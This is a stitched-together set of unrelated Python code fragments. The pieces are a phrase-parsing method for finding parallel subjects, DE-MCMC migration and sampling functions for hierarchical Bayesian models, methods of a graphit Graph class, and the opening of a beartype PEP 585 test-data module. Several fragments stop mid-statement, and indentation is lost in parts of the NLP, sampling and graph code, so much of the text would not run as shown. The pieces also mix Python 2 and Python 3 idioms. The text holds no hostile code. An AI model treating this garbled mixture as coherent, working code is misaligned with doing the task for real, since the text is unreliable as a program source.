    return [token for token in tokens
            if token.strip().lower() not in keywords]
def identify_parallel_subjects(self):
    """Collect every subject/triple phrase into a uniform descriptor list.

    Flattens self.list_of_subjects_candidate and self.list_of_NIN_pairs
    into {'type', 'string', 'index', ...} records, then hands the records
    to find_index_of_phrases_and_return_what_is_in_between_and_join_them
    to detect parallel (coordinated) subjects.

    Cases covered: both phrases in the subject list; one in the subject
    list and one in a triple; both inside triples.
    """
    print()
    sub_strings_list = []
    # 1. Subjects: either plain strings or lists possibly containing
    #    {'text', 'predicate', ...} dicts.
    for sub_idx, sub in enumerate(self.list_of_subjects_candidate):
        if type(sub) == type([]):
            there_is_object = False
            for s in sub:
                if type(s) == type({}):
                    sub_strings_list.append(
                        {'type': 'sub_list', 'string': s['text'], 'index': sub_idx, 'has_predicate': True})
                    there_is_object = True
            if not there_is_object:
                # No dict inside: represent the list by its first element.
                sub_string = sub[0]
                sub_strings_list.append(
                    {'type': 'sub_single', 'string': sub_string, 'index': sub_idx, 'has_predicate': False})
        else:
            sub_string = sub
            sub_strings_list.append(
                {'type': 'sub_single', 'string': sub_string, 'index': sub_idx, 'has_predicate': False})
    # 2. Triple elements: strings, lists, or {'text': ...} dicts; the index
    #    records [triple index, element index] for later rewriting.
    for idx, triple in enumerate(self.list_of_NIN_pairs):
        triple_pair = triple['triple']
        for element_idx, single_element in enumerate(triple_pair):
            if type(single_element) == type('x'):
                sub_strings_list.append(
                    {'type': 'triple_string', 'string': single_element, 'index': [idx, element_idx]})
            elif type(single_element) == type([]):  # a list
                sub_strings_list.append(
                    {'type': 'triple_list', 'string': single_element[0], 'index': [idx, element_idx]})
            elif type(single_element) == type({'a': 'b'}):  # a dict
                sub_strings_list.append(
                    {'type': 'triple_obj', 'string': single_element['text'], 'index': [idx, element_idx]})
    self.find_index_of_phrases_and_return_what_is_in_between_and_join_them(sub_strings_list)
def find_index_of_phrases_and_return_what_is_in_between_and_join_them(self, sub_string_list):
there_is_triple = False
one_contain_predicate = False
chosen_triple = ''
chosen_sub = ''
chosen_element = ''
# self.collection_of_cascading_subjects = set()
if len(sub_string_list) >= 2:
length = len(sub_string_list)
for idx, sub_string in enumerate(sub_string_list):
string = | |
newLike = Parallel(n_jobs = nJobs)(delayed(log_dens_like)(new_theta[subj,run[subj,:]], data[data['subj'] == subject], params) for subj, subject in enumerate(np.unique(data['subj'])))
for subj in xrange(nSubj): new_like[subj,run[subj,:]] = newLike[subj]
new_weight = prior + new_like
#find all chains to be accepted
accept_idx = np.exp(new_weight - weight) > uniform.rvs(size = (nSubj, nChains))
accept_idx = accept_idx & np.isfinite(new_weight) #only accept chains with finite likelihood
theta[accept_idx], like[accept_idx], weight[accept_idx] = new_theta[accept_idx], new_like[accept_idx], new_weight[accept_idx]
return theta, like, weight
def migration(theta, phiMu, phiSigma, like, data, log_dens_like, params, dist, rp):
    """DE-MCMC migration step for subject-level chains under a hierarchy.

    A random cycle of chains is chosen; each chain in the cycle proposes the
    (perturbed) parameters of its neighbor, evaluated under its own
    hyper-parameters, and accepts by Metropolis ratio.

    Args:
        theta: (nChains, nParams) current subject-level samples (updated in place).
        phiMu, phiSigma: per-chain group-level location/scale parameters.
        like: (nChains,) current log-likelihoods (updated in place).
        data, params: passed through to log_dens_like.
        log_dens_like: log-likelihood function.
        dist: distribution spec passed to log_dens_hyper.
        rp: half-width of the uniform migration perturbation.

    Returns:
        (theta, like, weight) -- updated in place and returned.
    """
    nChains, nParams = theta.shape[0], theta.shape[1]
    eta = max(random.choice(range(1, nChains + 1)), 2)  # number of migrating chains: at least 2
    # NOTE(review): shuffling the result of range() requires Python 2,
    # where range() returns a list.
    k = range(nChains)
    random.shuffle(k)
    chains = k[:eta]
    rotated = chains[1:] + [chains[0]]  # cyclic shift: each chain receives its neighbor's state
    weight = like + log_dens_hyper(theta.reshape(1,nChains,nParams), phiMu, phiSigma, dist)
    weight = weight.reshape(nChains)
    new_like = np.ones(eta) * (-1 * np.inf)
    # Have to reshape: log_dens_hyper requires subject index first.
    new_theta = (theta[rotated] + np.random.uniform(-rp,rp,size = (eta,1))).reshape(1,len(rotated),nParams)
    # Evaluate new chains (rotated) under the receiving chains' hypers.
    priorDens = log_dens_hyper(new_theta, phiMu[chains], phiSigma[chains], dist)
    priorDens = priorDens.reshape(len(rotated))
    # Only evaluate the likelihood where the prior density is finite.
    run = np.isfinite(priorDens)
    new_theta = new_theta.reshape(len(rotated), nParams)
    if np.sum(run) > 0: new_like[run] = log_dens_like(new_theta[run], data, params)
    new_weight = new_like + priorDens
    # Metropolis accept; accept_idx is as big as len(chains) and len(rotated).
    accept_idx = np.exp(new_weight - weight[chains]) > uniform.rvs(size = eta)
    accept_idx = accept_idx & (np.isfinite(new_weight))
    chains = np.array(chains)
    theta[chains[accept_idx]] = new_theta[accept_idx]
    like[chains[accept_idx]] = new_like[accept_idx]
    weight[chains[accept_idx]] = new_weight[accept_idx]
    return theta, like, weight
def migrationSubject(theta, like, data, log_dens_like, params, dist, priors, rp, nJobs = -1, parallel = False):
    """Migration step for chains evaluated against a fixed (non-hierarchical) prior.

    A random subset of chains receives proposals from a cyclically rotated
    copy of itself, perturbed by uniform noise in [-rp, rp], accepted by a
    per-chain Metropolis ratio on (log-likelihood + log prior density).

    theta         : (nChains, nParams) parameter values
    like          : (nChains,) current log-likelihood per chain
    data          : data passed through to log_dens_like
    log_dens_like : log-likelihood function
    params        : parameter names, passed through to log_dens_like
    dist          : distributional form used by log_dens_prior
    priors        : prior specification used by log_dens_prior
    rp            : half-width of the uniform migration perturbation
    nJobs         : number of joblib workers when parallel is True
    parallel      : evaluate the likelihood of each proposed chain in parallel

    Returns updated (theta, like, weight); theta and like are modified in
    place for the accepted chains.
    """
    nChains, nParams = theta.shape
    eta = max(random.choice(range(1, nChains + 1)), 2) #eta: number of chains to be used: at least 2
    k = range(nChains)
    random.shuffle(k)
    chains = k[:eta]
    rotated = chains[1:] + [chains[0]]
    weight = like + log_dens_prior(theta, priors, dist)
    weight = weight.reshape(nChains)
    # Default to -inf so proposals outside the prior's support can never be
    # accepted.  (BUG FIX: this initialization used to be clobbered by a later
    # np.zeros re-initialization, silently giving such proposals weight 0.)
    new_like = np.ones(eta) * (-1 * np.inf)
    new_theta = (theta[rotated] + np.random.uniform(-rp,rp,size = (eta,1)))
    priorDens = log_dens_prior(new_theta, priors, dist) #evaluate new chains (rotated) under old ones (chains)
    run = np.isfinite(priorDens)  # only evaluate the likelihood where the prior has support
    new_theta = new_theta.reshape(len(rotated), nParams)
    toRun = np.where(run)[0]
    if parallel == True:
        newLike = np.array(Parallel(n_jobs = nJobs)(delayed(log_dens_like)(new_theta[chain], data, params) for chain in toRun)).flatten()
        # BUG FIX: write each parallel result back at its own chain index.  The
        # old loop enumerated xrange(len(toRun)) and therefore wrote to indices
        # 0..len(toRun)-1, misplacing likelihoods whenever `run` had gaps.
        for c, chain in enumerate(toRun): new_like[chain] = newLike[c]
    elif np.sum(run) > 0: new_like[run] = log_dens_like(new_theta[run], data, params)
    new_weight = new_like + priorDens
    accept_idx = np.exp(new_weight - weight[chains]) > uniform.rvs(size = eta) #accept_idx is as big as len(chains) and len(rotated)
    # Consistent with migration()/migrationHybrid_subj(): reject chains whose
    # proposed weight is non-finite (previously missing here).
    accept_idx = accept_idx & (np.isfinite(new_weight))
    chains = np.array(chains)
    theta[chains[accept_idx]] = new_theta[accept_idx]
    like[chains[accept_idx]] = new_like[accept_idx]
    weight[chains[accept_idx]] = new_weight[accept_idx]
    return theta, like, weight
def migrationHybrid_subj(theta, phiMu, phiSigma, like, data, log_dens_like, params, hierParams, groupParams, dist, rp):
    """Migration step for subject-level chains in a hybrid sampler.

    Like migration(), but only the hierarchically modelled parameters
    (hierParams) are evaluated under the hyper-level prior; group-level
    parameters (groupParams) are copied from the rotated chains without
    perturbation, since they are updated at the group level elsewhere.

    theta       : (nChains, nParams) subject-level parameter values
    phiMu       : hyper means for the hierarchical parameters, per chain
    phiSigma    : hyper scales for the hierarchical parameters, per chain
    like        : (nChains,) current log-likelihood per chain
    hierParams  : column indices of hierarchically modelled parameters
    groupParams : column indices of group-level parameters
    rp          : half-width of the uniform migration perturbation

    Returns updated (theta, like, weight).
    """
    nChains, nParams = theta.shape[0], theta.shape[1]
    eta = max(random.choice(range(1, nChains + 1)), 2) #eta: number of chains to be used: at least 2
    k = range(nChains)
    random.shuffle(k)  # NOTE: Python 2 idiom -- range() returns a (mutable) list here
    chains = k[:eta]
    rotated = chains[1:] + [chains[0]]  # cyclic rotation: each chain proposes its neighbour's state
    weight = like + log_dens_hyper(theta.reshape(1,nChains,nParams)[:,:,hierParams], phiMu, phiSigma, dist).reshape(nChains) #need to index only the hierParams in theta
    new_like = np.ones(eta) * (-1 * np.inf)  # default -inf so unevaluated proposals are never accepted
    new_theta = (theta[rotated] + np.random.uniform(-rp,rp,size = (eta,1))).reshape(len(rotated),nParams)
    for param in groupParams: new_theta[:,param] = theta[rotated,param]  # group-level params are copied, not perturbed
    new_theta = new_theta.reshape(1,len(rotated),len(params))
    priorDens = log_dens_hyper(new_theta[:,:,hierParams], phiMu[chains], phiSigma[chains], dist) #evaluate new chains (rotated) under old ones (chains)
    priorDens = priorDens.reshape(len(rotated))
    run = np.isfinite(priorDens)  # only evaluate the likelihood where the prior has support
    new_theta = new_theta.reshape(len(rotated),len(params))
    if np.sum(run) > 0: new_like[run] = log_dens_like(new_theta[run], data, params)
    new_weight = new_like + priorDens
    accept_idx = np.exp(new_weight - weight[chains]) > uniform.rvs(size = eta) #accept_idx is as big as len(chains) and len(rotated)
    accept_idx = accept_idx & (np.isfinite(new_weight))  # never accept a chain with non-finite posterior weight
    chains = np.array(chains)
    theta[chains[accept_idx]] = new_theta[accept_idx]
    like[chains[accept_idx]] = new_like[accept_idx]
    weight[chains[accept_idx]] = new_weight[accept_idx]
    return theta, like, weight
def migrationHybrid_group(theta, phiMu, like, data, log_dens_like, priors, params, groupParams, hierParams, dist, rp, nJobs):
    """Migration step for the group-level parameters in a hybrid sampler.

    A random subset of group-level chains (columns of phiMu) receives
    proposals from a cyclically rotated copy of itself, perturbed by uniform
    noise in [-rp, rp].  The proposed group values are written into every
    subject's theta before the likelihood is re-evaluated (in parallel, one
    job per subject), and accepted by a Metropolis ratio on the summed
    log-likelihood plus the group-level log prior.

    theta       : (nSubj, nChains, nParams) subject-level parameter values
    phiMu       : (nChains, len(groupParams)) group-level parameter values
    like        : (nSubj, nChains) current log-likelihood per subject/chain
    groupParams : column indices (into theta's last axis) of group parameters
    hierParams  : column indices of hierarchically modelled parameters
    rp          : half-width of the uniform migration perturbation
    nJobs       : number of joblib workers

    Returns updated (phiMu, theta, weight, like); all are modified in place
    for the accepted chains.
    """
    nSubj, nChains = theta.shape[0], theta.shape[1]
    eta = max(random.choice(range(1, nChains + 1)), 2) #eta: number of chains to be used: at least 2
    k = range(nChains)
    random.shuffle(k)
    chains = k[:eta]
    rotated = chains[1:] + [chains[0]]
    weight = np.sum(like, axis = 0) + log_dens_prior(phiMu, priors, dist)
    noise = np.random.uniform(-rp, rp, size = (eta,1))
    # (dead pre-allocation of new_phiMu removed: it was immediately overwritten)
    new_phiMu = phiMu[rotated] + noise
    new_theta = theta[:,chains] + 0.0  # "+ 0.0" forces a copy so theta is not mutated yet
    new_theta[:,:,groupParams] = new_phiMu.reshape(1,len(rotated),len(groupParams)) + 0.0
    prior = log_dens_prior(new_phiMu, priors, dist)
    new_like = np.ones((nSubj, len(rotated))) * (-1 * np.inf) #keep this varied by subject so you can reuse it
    run = np.isfinite(prior) #only evaluate chains whose proposal has prior support
    newLike = Parallel(n_jobs = nJobs)(delayed(log_dens_like)(new_theta[subj,run], data[data['subj'] == subject], params) for subj, subject in enumerate(np.unique(data['subj'])))
    for subj in xrange(nSubj): new_like[subj,run] = newLike[subj]
    new_weight = prior + np.sum(new_like, axis = 0)
    accept_idx = np.exp(new_weight - weight[chains]) > uniform.rvs(size = eta)
    accept_idx = accept_idx & (np.isfinite(new_weight))
    chains = np.array(chains)
    phiMu[chains[accept_idx]], weight[chains[accept_idx]], like[:,chains[accept_idx]] = new_phiMu[accept_idx], new_weight[accept_idx], new_like[:,accept_idx]
    #NOTE BELOW: I wanted to do this with two lists: theta[:,chain[accept_idx],groupParams], but Python won't let you index with two lists. Might need to find another solution
    for i, param in enumerate(groupParams):
        theta[:,chains[accept_idx],param] = phiMu[chains[accept_idx],i].reshape(1,len(chains[accept_idx]))
    return phiMu, theta, weight, like
#due to only operating on a single parameter, prior mu and sigma are separate
#theta and the phis are only of a single parameter
#...param: this is an index, not a parameter name
def migrationHyper(theta, phiMu, phiSigma, priors, dist, param, p, rp, kdePriors = None):
    """Migration step for the hyper-level (phiMu, phiSigma) chains of one parameter.

    Because this operates on a single parameter, phiMu and phiSigma are 1-D
    (one value per chain) and theta contains only that parameter's
    subject-level samples.

    theta     : subject-level samples for this parameter only
    phiMu     : (nChains,) hyper means for this parameter
    phiSigma  : (nChains,) hyper scales for this parameter
    priors    : prior specification for the density function
    dist      : distributional form
    param     : index of the parameter (an index into p, not a name)
    p         : list of parameter names
    rp        : half-width of the uniform migration perturbation
    kdePriors : optional {'mu': {...}, 'sigma': {...}} KDE priors keyed by
                parameter name

    Returns updated (phiMu, phiSigma, hyperWeight); phiMu and phiSigma are
    modified in place for the accepted chains.
    """
    # Resolve the optional KDE prior for this parameter by name
    # ("is not None" / direct membership instead of "!= None" / ".keys()").
    if kdePriors is not None and p[param] in kdePriors['mu']:
        kdePriorsMu, kdePriorsSigma = kdePriors['mu'][p[param]], kdePriors['sigma'][p[param]]
    else:
        kdePriorsMu, kdePriorsSigma = None, None
    nChains = len(phiMu)
    eta = max(random.choice(range(1, nChains + 1)), 2) #eta: number of chains to be used: at least 2
    k = range(nChains)
    random.shuffle(k)
    chains = k[:eta]
    rotated = chains[1:] + [chains[0]]
    noise = np.random.uniform(-rp, rp, size = eta)
    new_phiMu, new_phiSigma = phiMu[rotated] + noise, phiSigma[rotated] + noise
    hyperWeight = log_dens_hyper_and_prior_singleParam(theta, phiMu, phiSigma, priors, dist, param, kdePriorsMu, kdePriorsSigma)
    new_hyperWeight = log_dens_hyper_and_prior_singleParam(theta[:,chains], new_phiMu, new_phiSigma, priors, dist, param, kdePriorsMu, kdePriorsSigma)
    new_hyperWeight[np.isnan(new_hyperWeight)] = -1 * np.inf  # NaN proposals can never be accepted
    accept_idx = np.exp(new_hyperWeight - hyperWeight[chains]) > uniform.rvs(size = eta) #accept_idx is eta by nParams
    chains = np.array(chains)
    phiMu[chains[accept_idx]] = new_phiMu[accept_idx]
    phiSigma[chains[accept_idx]] = new_phiSigma[accept_idx]
    hyperWeight[chains[accept_idx]] = new_hyperWeight[accept_idx]
    return phiMu, phiSigma, hyperWeight
#this differs from the function above by looping through each of the parameters within the function, rather than in samplingHier
def migrationHyperBetween(thetas, phiMu, phiSigma, priors, dist, ps, hp, rp, kdePriors = None):
    """Migration step for hyper-level chains shared across parameter groups.

    Unlike migrationHyper(), this loops over every hyper parameter in hp
    internally (rather than being called once per parameter from
    samplingHier), stacking the matching subject-level samples from every
    group in `thetas` before evaluating the hyper density.

    thetas    : list of per-group theta arrays (nSubj x nChains x nParams)
    phiMu     : (nChains, nParams) hyper means
    phiSigma  : (nChains, nParams) hyper scales
    priors    : prior specification for the density function
    dist      : distributional form
    ps        : list of per-group parameter-name lists, parallel to thetas
    hp        : list of hyper parameter names
    rp        : half-width of the uniform migration perturbation
    kdePriors : optional {'mu': {...}, 'sigma': {...}} KDE priors keyed by
                parameter name

    Returns updated (phiMu, phiSigma, hyperWeight); phiMu and phiSigma are
    modified in place for the accepted chains.
    """
    nChains, nParams = phiMu.shape
    hyperWeight = np.zeros((nChains, nParams))
    for param in hp:
        # BUG FIX: the KDE-prior lookup previously ran once before this loop
        # using the undefined names `p` and `param` (copied verbatim from
        # migrationHyper), raising NameError whenever kdePriors was supplied.
        # Resolve it here, per hyper parameter, keyed by the parameter name.
        if kdePriors is not None and param in kdePriors['mu']:
            kdePriorsMu, kdePriorsSigma = kdePriors['mu'][param], kdePriors['sigma'][param]
        else:
            kdePriorsMu, kdePriorsSigma = None, None
        idx = hp.index(param)  # column of phiMu/phiSigma for this parameter
        eta = max(random.choice(range(1, nChains + 1)), 2) #eta: number of chains to be used: at least 2
        k = range(nChains)
        random.shuffle(k)
        chains = k[:eta]
        rotated = chains[1:] + [chains[0]]
        noise = np.random.uniform(-rp, rp, size = eta)
        new_phiMu, new_phiSigma = phiMu[rotated,idx] + noise, phiSigma[rotated,idx] + noise
        #create an array that contains all of the theta values that match the parameter
        ths = []
        for g in xrange(len(thetas)):
            theta, p = thetas[g], ps[g]
            if param in p:
                ths.append(theta[:,:,p.index(param)])
        for g2 in xrange(len(ths)):
            if g2 == 0: tht = ths[0]
            else: tht = np.vstack((tht, ths[g2]))
        hyperWeight[:, idx] = log_dens_hyper_and_prior_singleParam(tht, phiMu[:,idx], phiSigma[:,idx], priors, dist, idx, kdePriorsMu, kdePriorsSigma)
        new_hyperWeight = log_dens_hyper_and_prior_singleParam(tht[:,chains], new_phiMu, new_phiSigma, priors, dist, idx, kdePriorsMu, kdePriorsSigma)
        new_hyperWeight[np.isnan(new_hyperWeight)] = -1 * np.inf  # NaN proposals can never be accepted
        accept_idx = np.exp(new_hyperWeight - hyperWeight[chains,idx]) > uniform.rvs(size = eta) #accept_idx is eta by nParams
        chains = np.array(chains)
        phiMu[chains[accept_idx], idx] = new_phiMu[accept_idx]
        phiSigma[chains[accept_idx], idx] = new_phiSigma[accept_idx]
        hyperWeight[chains[accept_idx], idx] = new_hyperWeight[accept_idx]
    return phiMu, phiSigma, hyperWeight
##### SAMPLING PHASE #####
def phiSample(phiMu, phiSigma, nChains):
    """Draw nChains paired rows at random (without replacement) from the
    stored hyper-level samples.

    phiMu, phiSigma : (nSamples, nParams) arrays of hyper means / scales
    nChains         : number of rows to draw (must be <= nSamples)

    Returns (phiMu_subset, phiSigma_subset) indexed by the same random rows,
    so each mu stays paired with its sigma.
    """
    nSamples, nParams = phiMu.shape
    # BUG FIX: previously `vals = range(nSamples); shuffle(vals)`, which
    # raises TypeError on Python 3 where range() is an immutable sequence.
    # np.random.permutation gives the same uniform draw on both versions.
    vals = np.random.permutation(nSamples)[:nChains]
    return phiMu[vals], phiSigma[vals]
def samplingHier(data, p, dist, log_dens_like, starts, priors, nChains = 4, nmc = 100, burnin = 0, thin = 1, nJobs = 4, informedStart = -1, cont = False, recalculate = False, pb = False, **kwargs):
print 'HIERARCHICAL FIT'
print '----------------'
print 'nChains: ' + str(nChains) + ' Burnin: ' + str(burnin) + ' nmc: ' + str(nmc) + ' thin: ' + str(thin)
print '# parameters: ' + str(len(p))
print p
print 'dist: ' + str(dist)
if 'gamma1' in kwargs.keys(): gamma1 = kwargs['gamma1']
else: gamma1 = False
if 'gammat0' in kwargs.keys(): gammat0 = kwargs['gammat0']
else: gammat0 = False
if gamma1 == True: print 'Using gamma = 1 every 10th iteration'
elif gammat0 == True: print 'Using gamma = | |
self.edges, self.adjacency = self.storagedriver(result.nodes, result.edges)
return self
def __iter__(self):
"""
Implement class __iter__
Iterate over nodes using iternodes
:return: single node Graph
:rtype: :graphit:Graph
"""
return self.iternodes()
def __len__(self):
"""
Implement class __len__
Represent the length of the graph as the number of nodes
:return: number of nodes
:rtype: int
"""
return len(self.nodes)
def __le__(self, other):
"""
Implement class __le__
Evaluates if self is less-then or equal to other in overall size
which is a combination of number of nodes and edges.
"""
if not isinstance(other, GraphBase):
raise GraphitException("Object {0} not instance of Graph base class".format(type(other).__name__))
return all([self.edges.keys() <= other.edges.keys(), self.nodes.keys() <= other.nodes.keys()])
def __lt__(self, other):
"""
Implement class __lt__
Evaluates if self is less-then other in overall size which is a
combination of number of nodes and edges.
"""
if not isinstance(other, GraphBase):
raise GraphitException("Object {0} not instance of Graph base class".format(type(other).__name__))
return all([self.edges.keys() < other.edges.keys(),
self.nodes.keys() < other.nodes.keys()])
def __ne__(self, other):
"""
Implement class __ne__
Evaluate non-equality based on graph topology
.. warning:: This comparison does not consider identity in node or
edge attributes.
"""
if not isinstance(other, GraphBase):
return False
return not self.__eq__(other)
def __repr__(self):
"""
Implement class __repr__
String representation of the class listing node and edge count.
:rtype: :py:str
"""
return '<{0} object {1}: {2} nodes, {3} edges>'.format(
type(self).__name__, id(self), len(self.nodes), len(self.edges))
def __setstate__(self, state):
"""
Implement class __setstate__
Enables the class to be unpickled. Required because the class uses
__slots__
:param state: object content for unpickling
:type state: :py:dict
"""
for key, value in state.items():
if key in self.__slots__:
setattr(self, key, value)
def __sub__(self, other):
"""
Implement class __sub__, subtraction (-).
If the two graphs share a common origin graph then a subtraction
will not update the attributes because attribute removal will also
affect all other subgraphs derived from it.
Graph subtraction is handled by the `graph_subtract` function.
:param other: Graph to subtract
:type other: :graphit:Graph
:return: difference graph
:rtype: :graphit:Graph
:raises: GraphitException, if other is not a Graph
"""
if not isinstance(other, GraphBase):
raise GraphitException("Object {0} not instance of Graph base class".format(type(other).__name__))
return graph_subtract(self, other)
@classmethod
def _get_class_object(cls):
"""
Returns the current class object. Used by the graph ORM to construct
new Graph based classes
"""
return cls
def _set_auto_nid(self):
"""
Set the automatically assigned node ID (nid) based on the '_id' node
attributes in the current graph
"""
_id = [attr.get('_id', 0) for attr in self.nodes.values()]
if len(_id):
self._nodeid = max(_id) + 1
    def _set_origin(self, graph):
        """
        Set the origin graph reference on this instance.

        :param graph: Graph instance
        """
        if isinstance(graph, GraphBase):
            # NOTE(review): weakref.ref(...)() creates a weak reference and
            # immediately dereferences it, yielding a plain (strong) reference
            # to graph.origin again -- presumably intended to avoid building
            # chains of weakrefs through nested subgraphs; confirm intent.
            self.origin = weakref.ref(graph.origin)()
    def add_edge(self, nd1, nd2, directed=None, node_from_edge=False, unicode_convert=True, run_edge_new=True,
                 **kwargs):
        """
        Add edge between two nodes to the graph

        An edge is defined as a connection between two node ID's.
        Edge metadata defined as a dictionary allows it to be queried
        by the various graph query functions.

        After the new edge is created the edge class 'new' method is called
        once to allow any custom edge initiation to be performed. This
        feature can be customized by overloading the 'new' method in the
        NodeEdgeToolsBaseClass abstract base class.
        Calling the 'new' method can be disabled using the run_edge_new flag.

        :param nd1: first node in edge node pair. Source node in
                    directed graph.
        :param nd2: second node in edge node pair. Target node in
                    directed graph.
        :param directed: override the graph definition for directed
                         for the added edge.
        :type directed: :py:bool
        :param node_from_edge: make node for edge node id's not in graph
        :type node_from_edge: :py:bool
        :param unicode_convert: convert string types to unicode
        :type unicode_convert: :py:bool
        :param run_edge_new: run the custom initiation method (new method) of
                             the new edge once.
        :type run_edge_new: :py:bool
        :param kwargs: any additional keyword arguments to be added as
                       edge metadata.

        :return: edge ID
        :rtype: :py:tuple
        """
        # If node_from_edge then disable auto_nid, forcing identical node
        # and edge ID's; the original setting is restored before returning.
        curr_auto_nid = self.auto_nid
        if node_from_edge:
            self.auto_nid = False
        nd1 = to_unicode(nd1, convert=unicode_convert)
        nd2 = to_unicode(nd2, convert=unicode_convert)
        # Both edge nodes must exist, or be creatable when node_from_edge.
        for nodeid in (nd1, nd2):
            if nodeid not in self.nodes:
                if node_from_edge:
                    self.add_node(nodeid)
                else:
                    raise GraphitException('Node with id {0} not in graph.'.format(nodeid))
        # Create edge tuples, directed or un-directed (local override possible for mixed graph).
        if directed is None:
            directed = self.directed
        edges_to_add = make_edges((nd1, nd2), directed=directed)
        edges_added = []
        for i, edge in enumerate(edges_to_add):
            if edge in self.edges:
                logger.warning('Edge between nodes {0}-{1} exists. Use edge update to change attributes.'.format(*edge))
                continue
            # Un-directed edge: the second edge tuple shares (points to) the
            # attribute dictionary of the first, keeping both views in sync.
            if i == 1 and not directed:
                self.edges[edge] = self.edges[edges_to_add[0]]
            else:
                # Make a deepcopy of the added attributes
                self.edges[edge] = prepaire_data_dict(copy.deepcopy(kwargs))
            edges_added.append(edge)
            logger.debug('Add edge between node {0}-{1}'.format(*edge))
        # Call 'new' method of new edges once to allow for custom initiation
        if run_edge_new:
            for edge in edges_added:
                self.getedges(edge).new()
        # If node_from_edge, restore auto_nid setting
        self.auto_nid = curr_auto_nid
        return edges_to_add[0]
def add_edges(self, edges, node_from_edge=False, unicode_convert=True, run_edge_new=True, **kwargs):
"""
Add multiple edges to the graph.
This is the iterable version of the add_edge methods allowing
multiple edge additions from any iterable.
If the iterable yields a tuple with a dictionary as third
argument the key/value pairs of that dictionary will be added
as attributes to the new edge along with any keyword arguments
passed to the method.
The latter functionality can be used to add the edges of one
graph to those of another by using graph.edges.items() as
argument to `add_edges`.
:param edges: Objects to be added as edges to the graph
:type edges: Iterable of hashable objects
:param node_from_edge: make node for edge node id's not in graph
:type node_from_edge: :py:bool
:param unicode_convert: convert string types to unicode
:type unicode_convert: :py:bool
:param run_edge_new: run the custom initiation method (new method) of
the new edges once.
:type run_edge_new: :py:bool
:return: list of edge ids for the objects added in
the same order as th input iterable.
:rtype: :py:list
"""
edges_added = []
for edge in edges:
if len(edge) == 3 and isinstance(edge[2], dict):
attr = {}
attr.update(edge[2])
attr.update(kwargs)
edges_added.append(self.add_edge(edge[0], edge[1], node_from_edge=node_from_edge,
unicode_convert=unicode_convert, run_edge_new=run_edge_new, **attr))
else:
edges_added.append(self.add_edge(edge[0], edge[1], unicode_convert=unicode_convert,
node_from_edge=node_from_edge, run_edge_new=run_edge_new, **kwargs))
return edges_added
def add_node(self, node=None, unicode_convert=True, run_node_new=True, **kwargs):
"""
Add a node to the graph
All nodes are stored using a dictionary like data structure that can be
represented like:
{nid: {'_id': auto_nid, attribute_key: attribute_value, ....}}
'nid' is the primary node identifier which is either an auto-incremented
unique integer value if `Graph.auto_nid` equals True or a custom value
when False.
If `Graph.auto_nid` equals True, the `node` parameter is stored as part
of the node attributes (value in the above dict example) using the
`Graph.key_tag` as key unless overloaded by any additional keyword
arguments provided to the method.
Using the key_tag and value_tag is a convenient way of storing node
data that should be accessible using the same key. The key_tag and
value_tag are used as default in the various dictionary style set and
get methods of the graph, node and edge classes.
When `Graph.auto_nid` equals False, the `node` parameter becomes the
primary node identifier that can be any hashable object except None.
.. note:: With auto_nid disabled the method checks if there is a node
with nid in the graph already. If found, a warning is logged
and the attributes of the existing node are updated.
The node attribute dictionary contains at least the '_id' attribute
representing the unique auto-incremented integer node identifier and
any additional keyword argument provided to the method (kwargs)
After de new node is created the node class 'new' method is called once
to allow any custom node initiation to be performed. | |
<filename>beartype_test/a00_unit/data/hint/pep/proposal/_data_pep585.py
#!/usr/bin/env python3
# --------------------( LICENSE )--------------------
# Copyright (c) 2014-2021 Beartype authors.
# See "LICENSE" for further details.
'''
Project-wide :pep:`585`-compliant **type hint test data.**
'''
# ....................{ IMPORTS }....................
from beartype._util.py.utilpyversion import IS_PYTHON_AT_LEAST_3_9
# ....................{ ADDERS }....................
def add_data(data_module: 'ModuleType') -> None:
'''
Add :pep:`585`-compliant type hint test data to various global containers
declared by the passed module.
Parameters
----------
data_module : ModuleType
Module to be added to.
'''
# If the active Python interpreter targets less than Python < 3.9, this
# interpreter fails to support PEP 585. In this case, reduce to a noop.
if not IS_PYTHON_AT_LEAST_3_9:
return
# Else, the active Python interpreter targets at least Python >= 3.9 and
# thus supports PEP 585.
# ..................{ IMPORTS }..................
# Defer Python >= 3.9-specific imports.
import re
from beartype._cave._cavefast import IntType
from beartype._data.hint.pep.sign.datapepsigns import (
HintSignByteString,
HintSignCallable,
HintSignContextManager,
HintSignDict,
HintSignGeneric,
HintSignList,
HintSignMatch,
HintSignMutableSequence,
HintSignPattern,
HintSignSequence,
HintSignTuple,
HintSignType,
)
from beartype_test.a00_unit.data.data_type import (
Class,
Subclass,
SubclassSubclass,
OtherClass,
OtherSubclass,
# OtherSubclassSubclass,
context_manager_factory,
)
from beartype_test.a00_unit.data.hint.util.data_hintmetacls import (
HintPepMetadata,
HintPithSatisfiedMetadata,
HintPithUnsatisfiedMetadata,
)
from collections.abc import (
ByteString,
Callable,
Container,
Iterable,
MutableSequence,
Sequence,
Sized,
)
from contextlib import AbstractContextManager
from re import Match, Pattern
from typing import Any, TypeVar, Union
# ..................{ TYPEVARS }..................
S = TypeVar('S')
'''
User-defined generic :mod:`typing` type variable.
'''
T = TypeVar('T')
'''
User-defined generic :mod:`typing` type variable.
'''
# ..................{ CLASSES ~ generics : single }..................
class Pep585GenericUntypevaredSingle(list[str]):
'''
:pep:`585`-compliant user-defined generic subclassing a single
subscripted (but unparametrized) builtin type.
'''
# Redefine this generic's representation for debugging purposes.
def __repr__(self) -> str:
return f'{self.__class__.__name__}({super().__repr__()})'
class Pep585GenericTypevaredSingle(list[S, T]):
'''
:pep:`585`-compliant user-defined generic subclassing a single
parametrized builtin type.
'''
# Redefine this generic's representation for debugging purposes.
def __repr__(self) -> str:
return f'{self.__class__.__name__}({super().__repr__()})'
# ..................{ CLASSES ~ generics : multiple }..................
class Pep585GenericUntypevaredMultiple(
Callable, AbstractContextManager[str], Sequence[str]):
'''
:pep:`585`-compliant user-defined generic subclassing multiple
subscripted (but unparametrized) :mod:`collection.abc` abstract base
classes (ABCs) *and* an unsubscripted :mod:`collection.abc` ABC.
'''
# ................{ INITIALIZERS }................
def __init__(self, sequence: tuple) -> None:
'''
Initialize this generic from the passed tuple.
'''
assert isinstance(sequence, tuple), f'{repr(sequence)} not tuple.'
self._sequence = sequence
# ................{ ABCs }................
# Define all protocols mandated by ABCs subclassed by this generic.
def __call__(self) -> int:
return len(self)
def __contains__(self, obj: object) -> bool:
return obj in self._sequence
def __enter__(self) -> object:
return self
def __exit__(self, *args, **kwargs) -> bool:
return False
def __getitem__(self, index: int) -> object:
return self._sequence[index]
def __iter__(self) -> bool:
